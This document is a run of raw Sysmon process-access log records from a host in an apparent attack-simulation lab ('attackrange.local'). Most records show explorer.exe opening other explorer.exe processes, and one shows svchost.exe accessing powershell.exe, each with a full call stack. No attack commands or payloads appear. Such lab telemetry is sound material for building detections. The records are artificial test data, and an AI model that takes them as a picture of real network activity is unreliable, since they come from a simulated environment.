22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 